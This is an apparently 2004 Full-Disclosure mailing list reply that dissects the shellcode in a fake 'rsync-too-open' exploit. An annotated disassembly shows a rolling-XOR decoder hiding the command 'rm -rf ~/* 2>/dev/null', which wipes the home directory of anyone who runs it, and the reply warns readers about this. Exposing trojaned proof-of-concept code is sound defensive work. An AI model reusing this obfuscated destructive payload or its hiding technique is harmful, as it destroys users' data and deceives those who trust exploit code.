Re: [Full-Disclosure] new rsync :) exploit rsync-too-open

From: Blue Boar (BlueBoar_at_thievco.com)
Date: 05/29/04

    To: dkey <dk.dbox2@gmx.net>
    Date: Fri, 28 May 2004 17:04:10 -0700
    
    

    dkey wrote:

    > "nice mail"...but if somebody wants to use it, check the shellcode first...i
    > think it deletes all your files in your home dir. i'm not sure, maybe
    > somebody else can check it...

    Yes. The shellcode is a two-stage booby trap: a short rolling-XOR decoder (key starts at 0FFh and is decremented once per byte) sits in front of a 75-byte encoded body, so the `rm -rf` string never appears in the exploit source and only shows up once you decode it or run it. Decoded, the listing is:

    seg000:00000000 ; Payload carried by the "rsync-too-open" PoC: a 62h-byte Linux/x86 shellcode.
    seg000:00000000 ; Layout: 2-byte jmp, rolling-XOR decoder (sub_2), then a 75-byte encoded
    seg000:00000000 ; body (17h..61h) holding the strings and the execve/exit stub.
    seg000:00000000 ; The body is decoded in place and then executed, so the buffer it lands in
    seg000:00000000 ; has to be both writable and executable (it would fault on an NX stack).
    seg000:00000000 ; Segment type: Pure code
    seg000:00000000 seg000 segment byte public 'CODE' use32
    seg000:00000000 assume cs:seg000
    seg000:00000000 assume es:nothing, ss:nothing,
    ds:nothing, fs:nothing, gs:nothing
    seg000:00000000 jmp short loc_12 ; jmp/call/pop trick: obtain the EIP-relative address of the encoded body
    seg000:00000002
    seg000:00000002 ; ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ S U B R O U T I N E ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦
    seg000:00000002
    seg000:00000002 ; sub_2 -- in-place decoder. Entered via the call at loc_12, so the "return
    seg000:00000002 ; address" it pops is the start of the encoded body (17h). Never returns; falls
    seg000:00000002 ; into the decoded code with jmp short decoded.
    seg000:00000002 sub_2 proc near ; CODE XREF: sub_2+10p
    seg000:00000002 pop esi ; ESI = address pushed by call at loc_12 = start of encoded body (17h)
    seg000:00000003 xor ecx, ecx ; ECX = 0
    seg000:00000005 mov cl, 75 ; 75 (4Bh) bytes to decode: 17h..61h inclusive
    seg000:00000007 mov al, 255 ; initial XOR key = 0FFh
    seg000:00000009
    seg000:00000009 decode_loop: ; CODE XREF: sub_2+Cj
    seg000:00000009 xor [esi], al ; decode one byte in place (self-modifying code)
    seg000:0000000B dec al ; rolling key: byte i of the body was XORed with (0FFh - i)
    seg000:0000000D inc esi ; next byte
    seg000:0000000E loop decode_loop ; ECX--, repeat while ECX != 0
    seg000:00000010 jmp short decoded ; body is now plaintext; execute it
    seg000:00000012 ; ---------------------------------------------------------------------------
    seg000:00000012
    seg000:00000012 loc_12: ; CODE XREF: seg000:00000000j
    seg000:00000012 call sub_2 ; pushes 17h (address of the encoded body) as the return address
    seg000:00000017
    seg000:00000017 decoded: ; CODE XREF: sub_2+Ej -- everything from here to 61h is stored XOR-encoded
    seg000:00000017 call loc_41 ; pushes 1Ch = address of "/bin/sh"; the return address is reused as a data pointer
    seg000:00000017 ; ---------------------------------------------------------------------------
    seg000:0000001C aBinSh db '/bin/sh',0 ; EBP+0: execve filename
    seg000:00000024 aSh db 'sh',0 ; EBP+8: argv[0]
    seg000:00000027 aC db '-c',0 ; EBP+0Bh: argv[1]
    seg000:0000002A aRmRf2DevNull db 'rm -rf ~/* 2>/dev/null',0 ; EBP+0Eh: argv[2] -- the actual payload: wipe the home directory, errors discarded
    seg000:00000041 ; ---------------------------------------------------------------------------
    seg000:00000041
    seg000:00000041 loc_41: ; CODE XREF: sub_2+15p
    seg000:00000041 pop ebp ; EBP = address of "/bin/sh" (1Ch); all string offsets below are relative to it
    seg000:00000042 xor eax, eax ; EAX = 0
    seg000:00000042 sub_2 endp
    seg000:00000042
    seg000:00000044 push eax ; argv[3] = NULL terminator
    seg000:00000045 lea ebx, [ebp+0Eh]
    seg000:00000048 push ebx ; argv[2] = "rm -rf ~/* 2>/dev/null"
    seg000:00000049 lea ebx, [ebp+0Bh]
    seg000:0000004C push ebx ; argv[1] = "-c"
    seg000:0000004D lea ebx, [ebp+8]
    seg000:00000050 push ebx ; argv[0] = "sh"
    seg000:00000051 mov ebx, ebp ; filename = "/bin/sh"
    seg000:00000053 mov ecx, esp ; argv = ESP (the four pushes above, in order)
    seg000:00000055 xor edx, edx ; envp = NULL: the shell starts with an empty environment (no HOME)
    seg000:00000057 mov al, 0Bh ; EAX = 11 = __NR_execve (EAX was zeroed above, so no partial-register garbage)
    seg000:00000059 int 80h ; LINUX - sys_execve("/bin/sh", {"sh","-c","rm -rf ~/* 2>/dev/null",NULL}, NULL)
    seg000:0000005B mov ebx, eax ; only reached if execve failed: EBX = its return value (-errno)
    seg000:0000005D xor eax, eax
    seg000:0000005F inc eax ; EAX = 1 = __NR_exit; the exit status is EBX (execve's error), not 1
    seg000:00000060 int 80h ; LINUX - sys_exit
    seg000:00000060 seg000 ends
    seg000:00000060 end

    AKA execve("/bin/sh", ["sh", "-c", "rm -rf ~/* 2>/dev/null"], NULL) -- i.e. "/bin/sh -c 'rm -rf ~/* 2>/dev/null'", run with an empty environment. Note that envp is NULL, so HOME is not set when the shell starts; what `~` then expands to depends on the shell's fallback (bash, for one, uses the passwd home directory of the invoking user), so do not count on the missing HOME to neuter it. Anyone who ran the "exploit" as themselves should assume their home directory is gone; do not test unreviewed PoC shellcode outside a throwaway VM.

                                                    BB

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html

